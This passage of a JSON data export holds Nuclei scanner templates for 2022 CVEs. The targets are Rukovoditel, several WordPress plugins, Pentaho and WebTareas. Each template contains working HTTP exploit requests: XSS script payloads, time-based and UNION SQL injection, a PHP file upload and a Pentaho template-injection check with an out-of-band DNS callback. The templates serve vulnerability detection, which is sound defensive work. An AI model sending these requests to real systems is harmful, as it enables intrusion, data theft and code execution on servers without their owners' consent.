490a00463044022073ffd18a48fa52cec919649b657d84376a793ad133c7b39d97b8d185b58a3d0c022078b83eb05ade26cc3df8dd6618ade63db583eea4d1911033468084f1cb2bf959:922c64590222798bb761d5b6d8e72950", "hash": "8d79801e5db65dd3ebf9df8730f66bab", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b4" }, "name": "CVE-2022-43167.yaml", "content": "id: CVE-2022-43167\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/7\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43167\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43167\n cwe-id: CWE-79\n epss-score: 0.00197\n epss-percentile: 0.56575\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100ca9e12798bdb85ab1b55ededba807df802f821b90f81117202c99e86869a86a0022100e8b453b46860085a0f2cbe7d66113b72e4e39f539ff8c745b3f9db7ce1d3c2a8:922c64590222798bb761d5b6d8e72950", "hash": "58e66808a59e537305bcfe90e42f668a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b5" }, "name": "CVE-2022-43169.yaml", "content": "id: CVE-2022-43169\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add New Group\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the necessary patches provided by the vendor to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/3\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43169\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43169\n cwe-id: CWE-79\n epss-score: 0.003\n epss-percentile: 0.66367\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100ceebff44463a50c3f8cdfd03eb5a3449476a6d347a5014da85b0dc03d249e1dc02210089091f4d3daefd628b027f9ba865a756c4f31281aec45252b014c6653e2ebb28:922c64590222798bb761d5b6d8e72950", "hash": "f07d78ef19c41ff01958f58b1e86a546", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b6" }, "name": "CVE-2022-43170.yaml", "content": "id: CVE-2022-43170\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add info block\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/6\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43170\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43170\n cwe-id: CWE-79\n epss-score: 0.26563\n epss-percentile: 0.96323\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&type=info_block&is_active=1§ions_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a00463044022050159dcb3305abbac67f828aa26ed8c27682f0fab2c0ebe28a29cbbaf8adb450022065e31b15fafe74e1177ad1e2787cf1d8483181eae49e031828eb791e6640e622:922c64590222798bb761d5b6d8e72950", "hash": "41502d9ed137cb84672f4b48d3776e08", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b7" }, "name": "CVE-2022-43185.yaml", "content": "id: CVE-2022-43185\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/1\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43185\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43185\n cwe-id: CWE-79\n epss-score: 0.45754\n epss-percentile: 0.97082\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4a0a00473045022100bc300fd32b6adf7bc6aac4589f0eb432976dd5e3e894c339bb71185d1b37c6da022043adf86185cdd562f52a3f7407dbe76cf38ac54c42fb933cbf55a15ed9a3b952:922c64590222798bb761d5b6d8e72950", "hash": "716dd9d541d686691a94831d4869fd20", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b8" }, "name": "CVE-2022-4320.yaml", "content": "id: CVE-2022-4320\n\ninfo:\n name: WordPress Events Calendar <1.4.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.4.5.\n reference:\n - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4320\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4320\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.3872\n cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: mhsoftware\n product: wordpress_events_calendar_plugin\n framework: wordpress\n tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\">'\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback='\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=-->'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'imgNavLeftXX\\\">'\n - '({});'\n - '>.js'\n condition: or\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220754824a39c96f4cf434e9eb86e0a47441d3e9724d05ac3bd63ca2c7d54c20270022100d913f8ee7c703312dd076bb9fa9fac645bd47d3e8ab78d97ee9e0fa071909843:922c64590222798bb761d5b6d8e72950", "hash": "e3c1be128d7d29fa2db501cad7dfe8b5", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b9" }, "name": "CVE-2022-4321.yaml", "content": "id: CVE-2022-4321\n\ninfo:\n name: PDF Generator for WordPress < 1.1.2 - Cross Site Scripting\n author: r3Y3r53,HuTa0\n severity: medium\n description: |\n The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website.\n remediation: Fixed in version 1.1.2\n reference:\n - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4321\n - https://wordpress.org/plugins/pdf-generator-for-wp/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/kwalsh-rz/github-action-ecr-scan-test\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4321\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.32646\n cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpswings\n product: pdf_generator_for_wordpress\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/pdf-generator-for-wp\"\n tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '>'\n - 'pdf-generator-for-wp'\n - 'Total execution time is'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210083c8c3f4e22e416c26bdc706267a29aa4b94d13ca7d660eb68252ea62f0060fa022042f44c28eaba59c10e9718743b4c4f9826d6aa75302d56062cefbb4a345e98fd:922c64590222798bb761d5b6d8e72950", "hash": "df202aa0cab8bd7ecb6ea66d1c3ebfe3", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ba" }, "name": "CVE-2022-4325.yaml", "content": "id: CVE-2022-4325\n\ninfo:\n name: WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.10.1.\n reference:\n - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395\n - https://wordpress.org/plugins/post-status-notifier-lite/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4325\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4325\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.32657\n cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ifeelweb\n product: post_status_notifier_lite\n framework: wordpress\n tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Post Status Notifier Lite\")'\n condition: and\n# digest: 490a0046304402205206499c7d6a2bedfe29a673b7c4c487f6357884ab5336b30c33d3f7116b4bfd02202e13bd6b2db15b9f638ba8688c91867f9730b8e4efa5df27dbf609ff6a0196f4:922c64590222798bb761d5b6d8e72950", "hash": "91dcb3d94a7d71cfcb53404f0b92598a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085bb" }, "name": "CVE-2022-4328.yaml", "content": "id: CVE-2022-4328\n\ninfo:\n name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload\n author: theamanrawat\n severity: critical\n description: |\n The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.\n remediation: Fixed in version 18.0\n reference:\n - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed\n - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4328\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4328\n cwe-id: CWE-434\n epss-score: 0.22681\n epss-percentile: 0.96077\n cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: najeebmedia\n product: woocommerce_checkout_field_manager\n framework: wordpress\n tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n --------------------------22728be7b3104597\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n Content-Type: application/octet-stream\n\n \n\n --------------------------22728be7b3104597--\n - |\n GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - fe5df26ce4ca0056ffae8854469c282f\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f22baef697a8a8d3b9cd970350ff7726ecc8317f7519fc4fc7986bc3b90deb640221009b219b5e2ad6ff59b71ad028d818ae581463c01d52d7f535c7efac3e81d60bc5:922c64590222798bb761d5b6d8e72950", "hash": "90c518097ea00ccd7483a407cf212c17", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085bc" }, "name": "CVE-2022-43769.yaml", "content": "id: CVE-2022-43769\n\ninfo:\n name: Hitachi Pentaho Business Analytics Server - Remote Code Execution\n author: dwbzn\n severity: high\n description: |\n Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.\n remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2.\n reference:\n - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43769\n - http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-43769\n cwe-id: CWE-94,CWE-74\n epss-score: 0.33038\n epss-percentile: 0.96634\n cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hitachi\n product: vantara_pentaho_business_analytics_server\n shodan-query: http.favicon.hash:1749354953\n tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"false\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 4b0a004830460221008c170d16acd8d4fcd8b061a57759895cb1c1f4d2d844154a2bc28d348695383502210082727ca9d4adcdf1004042ef259119a55de484872ede8cad1aaf0ded1f7c2d8d:922c64590222798bb761d5b6d8e72950", "hash": "bb5804a3275c28ba612d9fce1a1adef2", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085bd" }, "name": "CVE-2022-44290.yaml", "content": "id: CVE-2022-44290\n\ninfo:\n name: WebTareas 2.4p5 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.\n reference:\n - http://webtareas.com/\n - https://github.com/anhdq201/webtareas/issues/2\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44290\n - http://webtareas.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-44290\n cwe-id: CWE-89\n epss-score: 0.01336\n epss-percentile: 0.8578\n cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: webtareas_project\n product: webtareas\n tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project\n\nhttp:\n - raw:\n - |\n POST /general/login.php?session=false HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"action\"\n\n login\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginForm\"\n\n {{username}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"passwordForm\"\n\n {{password}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginSubmit\"\n\n Log In\n -----------------------------3023071625140724693672385525--\n - |\n @timeout: 20s\n GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - duration>=6\n - status_code == 200\n - contains(header, \"text/html\")\n - contains(body, 'Delete the following?')\n condition: and\n# digest: 4a0a00473045022100ec9c9149107256ee388b4fad74e2dd7cb17cd09813c8e78bfee6e1f3fa76f85402206e12fab64eaca7a7280bd62ee2af0e78d716ae1ae94ef685835435bf889b63b8:922c64590222798bb761d5b6d8e72950", "hash": "51f1d9cacd1b5c7c0f79f6aab9651b16", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085be" }, "name": "CVE-2022-44291.yaml", "content": "id: CVE-2022-44291\n\ninfo:\n name: WebTareas 2.4p5 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.\n reference:\n - http://webtareas.com/\n - https://github.com/anhdq201/webtareas/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44291\n - http://webtareas.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-44291\n cwe-id: CWE-89\n epss-score: 0.01336\n epss-percentile: 0.8578\n cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: webtareas_project\n product: webtareas\n tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project\n\nhttp:\n - raw:\n - |\n POST /general/login.php?session=false HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"action\"\n\n login\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginForm\"\n\n {{username}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"passwordForm\"\n\n {{password}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginSubmit\"\n\n Log In\n -----------------------------3023071625140724693672385525--\n - |\n @timeout: 20s\n GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=6'\n - 'len(body_2) == 0'\n - 'status_code_2 == 302'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_1, \"webTareasSID\")'\n condition: and\n# digest: 4a0a00473045022100f9fa6e7b1841bcd70d3d68bb92ef27362bce875c298bee65f81acae33f5c999902201fc68f4f443a20fecb39c3509c24b3634548412e25006cef58d5867b3cbfc6e1:922c64590222798bb761d5b6d8e72950", "hash": "c49a44a3d39e60a469edc94a5e7efa12", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085bf" }, "name": "CVE-2022-4447.yaml", "content": "id: CVE-2022-4447\n\ninfo:\n name: WordPress Fontsy <=1.8.6 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.\n remediation: |\n Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad\n - https://wordpress.org/plugins/fontsy/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4447\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4447\n cwe-id: CWE-89\n epss-score: 0.03134\n epss-percentile: 0.9009\n cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fontsy_project\n product: fontsy\n framework: wordpress\n tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, 